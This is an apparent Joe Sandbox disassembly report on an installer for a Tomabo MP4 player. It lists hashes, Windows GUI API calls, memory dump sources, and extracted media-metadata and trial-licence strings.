                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a547d216f46f9d49a19fec309aad1e79dfbfcb46b1fd953d2a12a2a266bede37
                                                                                                                                                                                                  • Instruction ID: c03a268300cd1889648da09b2047a6451de8417136f20bedba57c0ea7081a424
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a547d216f46f9d49a19fec309aad1e79dfbfcb46b1fd953d2a12a2a266bede37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB317A36A117204FC75DDFFAED5646E7AB2E3E0314342822ED812CB265DB780409AAE5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430786
                                                                                                                                                                                                    • Part of subcall function 00429442: __EH_prolog.LIBCMT ref: 00429447
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                    • Part of subcall function 00439D28: __EH_prolog.LIBCMT ref: 00439D2D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                                                                                                                                  • String ID: %d/%d$%d:%d$%dx%d$Album$Aspect$Author$BitRate$Channels$Codec$Comment$Copyright$DurationInUs$FileType$Flags$Format$FrameRate$Frames$Genre$Index$Language$MediaType$MetaData$Resolution$SampleRate$SelectedAudioStream$SelectedCaptionStream$SelectedSubtitleStream$SelectedVideoStream$Size$StartTimeInUs$Stream$Streams$Title$Track$Year$audio$caption$subtitle$video
                                                                                                                                                                                                  • API String ID: 2206737547-198990648
                                                                                                                                                                                                  • Opcode ID: 80520f64d0df88e95f76565cdd242d8519106e43bc8e00c17dfbdc04f103485c
                                                                                                                                                                                                  • Instruction ID: 01efc49c770ffab0a35f27e105bb01f846b77bf4441460fcc177f7dceafd55cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80520f64d0df88e95f76565cdd242d8519106e43bc8e00c17dfbdc04f103485c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2028030B0061EAACF04FFF2E856DED7769AF08318B40442FB515A7591EB3DAA45CB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD8E4
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD8FD
                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 004AD90D
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004AD91F
                                                                                                                                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004AD947
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD957
                                                                                                                                                                                                    • Part of subcall function 004AD590: InflateRect.USER32(?,000000FF,000000FF), ref: 004AD5D2
                                                                                                                                                                                                    • Part of subcall function 004AD590: IsWindowEnabled.USER32(?), ref: 004AD5E5
                                                                                                                                                                                                    • Part of subcall function 004AD590: InflateRect.USER32(?,000000FF,000000FF), ref: 004AD60C
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD623
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD63C
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD654
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD66E
                                                                                                                                                                                                    • Part of subcall function 004AD590: SelectObject.GDI32(?,?), ref: 004AD693
                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 004AD969
                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004AD96D
                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 004AD975
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004AD979
                                                                                                                                                                                                  • SendMessageA.USER32(?,00000135,?,?), ref: 004AD98B
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD993
                                                                                                                                                                                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004AD9B8
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD9F0
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD9F7
                                                                                                                                                                                                  • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 004ADA0B
                                                                                                                                                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004ADA79
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004ADDCF
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004ADDE2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2549663215-0
                                                                                                                                                                                                  • Opcode ID: 384b5b170c1cbb0f478c1712ffa6985f51e9bfefbccb5adf81986f16ca5c7857
                                                                                                                                                                                                  • Instruction ID: 8413aa433982514e446c327abfc0626d20cb0baffa1ce925df97e537fa60ecbb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384b5b170c1cbb0f478c1712ffa6985f51e9bfefbccb5adf81986f16ca5c7857
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF168B1508301AFD300DF64CC89E6FBBE8FB99704F44492DF58282251E7B9E905CB6A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00429C91
                                                                                                                                                                                                    • Part of subcall function 004B5698: SetWindowTextW.USER32(?,?), ref: 004B56A6
                                                                                                                                                                                                    • Part of subcall function 004B5552: GetDlgItem.USER32(?,?), ref: 004B5560
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00508FAC,00000001), ref: 00429CDE
                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00429CE2
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00508F9C,00000001), ref: 00429D08
                                                                                                                                                                                                    • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429D71
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429DFF
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 00429E4E
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429EB0
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 00429F12
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429F8A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00429FA8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • If you want to continue using this software, you must purchase a license. Please click 'Buy Now' button to get one.If you alread, xrefs: 00429DDB
                                                                                                                                                                                                  • Close, xrefs: 00429D32
                                                                                                                                                                                                  • If you want to continue using this software, you must purchase a new license. Please click 'Buy Now' button to get one.If you al, xrefs: 00429E3D
                                                                                                                                                                                                  • If you want to continue using this software after this license expires, you must purchase a new license., xrefs: 00429E8C
                                                                                                                                                                                                  • Your free %d-day trial will expire soon., xrefs: 00429F2A
                                                                                                                                                                                                  • If you want to continue using this software after your free trial expires, please click 'Buy Now' button to purchase a license.I, xrefs: 00429F63
                                                                                                                                                                                                  • Expiration date: %d-%d-%d., xrefs: 00429E2F, 00429E7E
                                                                                                                                                                                                  • Your license has expired!, xrefs: 00429E01
                                                                                                                                                                                                  • Your license will expire soon., xrefs: 00429E50
                                                                                                                                                                                                  • Free %d-day trial, %d %s left., xrefs: 00429DBE, 00429EF3, 00429F55
                                                                                                                                                                                                  • Your free %d-day trial has expired!, xrefs: 00429D93, 00429EC8
                                                                                                                                                                                                  • days, xrefs: 00429DB1, 00429EE6, 00429F48
                                                                                                                                                                                                  • https://www.tomabo.com/mp4-player/purchase.html, xrefs: 00429FBC, 00429FC7, 00429FC8
                                                                                                                                                                                                  • day, xrefs: 00429DAA, 00429DB6, 00429EDF, 00429EEB, 00429F41, 00429F4D
                                                                                                                                                                                                  • Continue, xrefs: 00429F70
                                                                                                                                                                                                  • If you want to continue using this software, please click 'Buy Now' button to purchase a license.If you already have a license, , xrefs: 00429F01
                                                                                                                                                                                                  • This license doesn't work with the current version., xrefs: 00429DCE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: IconLoad$MessageSend$ColorH_prologItemTextWindowlstrlen
                                                                                                                                                                                                  • String ID: Close$Continue$Expiration date: %d-%d-%d.$Free %d-day trial, %d %s left.$If you want to continue using this software after this license expires, you must purchase a new license.$If you want to continue using this software after your free trial expires, please click 'Buy Now' button to purchase a license.I$If you want to continue using this software, please click 'Buy Now' button to purchase a license.If you already have a license, $If you want to continue using this software, you must purchase a license. Please click 'Buy Now' button to get one.If you alread$If you want to continue using this software, you must purchase a new license. Please click 'Buy Now' button to get one.If you al$This license doesn't work with the current version.$Your free %d-day trial has expired!$Your free %d-day trial will expire soon.$Your license has expired!$Your license will expire soon.$day$days$https://www.tomabo.com/mp4-player/purchase.html
                                                                                                                                                                                                  • API String ID: 241116362-3590744592
                                                                                                                                                                                                  • Opcode ID: 698083b1279744a0a6676de9459ff6ad405c670bb7b325ae18272eef2f9b0954
                                                                                                                                                                                                  • Instruction ID: 1f559b4b82b214c739383b9643d27565b42a58743d5f5a3b929e39be36a7bbeb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 698083b1279744a0a6676de9459ff6ad405c670bb7b325ae18272eef2f9b0954
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAA1E270E00309AADB20EBA5DD46FFEB6A5EF10708F50041EF606A22D1DB6CA904C769
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC81B
                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004AC823
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AC834
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004AC83B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004AC859
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004AC864
                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004AC87A
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3d), ref: 004AC894
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC8B0
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dNew), ref: 004AC8C7
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dL), ref: 004AC8D9
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dH), ref: 004AC8E6
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dLNew), ref: 004AC90A
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dHNew), ref: 004AC917
                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(C3dD), ref: 004AC93B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002A), ref: 004AC94E
                                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,004DF3C8,?), ref: 004AC991
                                                                                                                                                                                                  • GetClassInfoA.USER32(00000000,00008002,?), ref: 004AC9AE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                                                                                                                                                                                  • String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                                                                                                                                                                                  • API String ID: 1233821986-3277416593
                                                                                                                                                                                                  • Opcode ID: 32411f80ae35bcbf65a875fe81586005ea19eb087d9328ee044a3d7653ec3edd
                                                                                                                                                                                                  • Instruction ID: a0859a0317ac4a7d44fa800987f83c3685647439799cf4c29252688219810628
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32411f80ae35bcbf65a875fe81586005ea19eb087d9328ee044a3d7653ec3edd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8241E6766403009AD791AB65ECC1B6E3BA8FF66351F44052BE800973E0DBFC584A9B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?), ref: 004ABABD
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB0A
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB39
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?,?), ref: 004ABB57
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABB82
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004ABBBC
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD5D2
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD5E5
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD60C
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD623
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD63C
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD654
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD66E
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD693
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD6B7
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD6D7
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD6ED
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 004AD71B
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004AD73C
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AD752
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004AD76C
                                                                                                                                                                                                  • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 004AD794
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD79F
                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 004AD7B0
                                                                                                                                                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 004AD83C
                                                                                                                                                                                                    • Part of subcall function 004ABAA0: SetBkColor.GDI32(?,00000000), ref: 004ABBC4
                                                                                                                                                                                                  • DrawTextA.USER32(?,?,?,?,00000020), ref: 004AD874
                                                                                                                                                                                                  • GetFocus.USER32 ref: 004AD880
                                                                                                                                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 004AD891
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004AD8A2
                                                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 004AD8AE
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD8C1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1611134597-0
                                                                                                                                                                                                  • Opcode ID: 48da5025d427ca32c1dab687d2e3aa91c9e3ad2df32186c76da564dcd1c277a7
                                                                                                                                                                                                  • Instruction ID: 2fb06e4636c8d7688e320448532e604d4d98861aab7d315f30fc1400dd2601bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48da5025d427ca32c1dab687d2e3aa91c9e3ad2df32186c76da564dcd1c277a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EB17A75208202AFD304CF59CD85E6BBBE8FB99708F004A1CF59AD3291DB75E941CB66
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C0165
                                                                                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 004C01A8
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004C01BE
                                                                                                                                                                                                  • InflateRect.USER32(?,?,?), ref: 004C01D4
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004C01E5
                                                                                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 004C01EF
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0202
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C022C
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0277
                                                                                                                                                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 004C0294
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004C029F
                                                                                                                                                                                                  • InflateRect.USER32(?,?,?), ref: 004C02B5
                                                                                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 004C02C4
                                                                                                                                                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 004C02D9
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C02FA
                                                                                                                                                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004C0312
                                                                                                                                                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 004C033C
                                                                                                                                                                                                    • Part of subcall function 004C00ED: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004BF5E2), ref: 004C012C
                                                                                                                                                                                                    • Part of subcall function 004C00ED: CreatePatternBrush.GDI32(00000000), ref: 004C0139
                                                                                                                                                                                                    • Part of subcall function 004C00ED: DeleteObject.GDI32(00000000), ref: 004C0145
                                                                                                                                                                                                    • Part of subcall function 004B971F: SelectClipRgn.GDI32(?,00000000), ref: 004B9741
                                                                                                                                                                                                    • Part of subcall function 004B971F: SelectClipRgn.GDI32(?,?), ref: 004B9757
                                                                                                                                                                                                    • Part of subcall function 004B93E3: SelectObject.GDI32(?,00000000), ref: 004B9405
                                                                                                                                                                                                    • Part of subcall function 004B93E3: SelectObject.GDI32(?,?), ref: 004B941B
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 004C0392
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 004C03E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
                                                                                                                                                                                                  • String ID: VGL$hGL
                                                                                                                                                                                                  • API String ID: 4023391435-4226939623
                                                                                                                                                                                                  • Opcode ID: 23b61e129ae4ccbfd7f540a8e1178f025787340e7eb109f2120baa17673dec58
                                                                                                                                                                                                  • Instruction ID: ade47616a46ee2ccb1e894fe5b01775cb75e183297a05b3663ac00c51c0f2424
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b61e129ae4ccbfd7f540a8e1178f025787340e7eb109f2120baa17673dec58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA1F372900159EFCF05DFE5C995DEEBBB9EF18304F10412AF906A2291DB39AE05CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPropA.USER32(?,?), ref: 004ADE65
                                                                                                                                                                                                  • CallWindowProcA.USER32(00000000), ref: 004ADE8D
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004AB9E6
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004AB9FE
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004ABA0A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
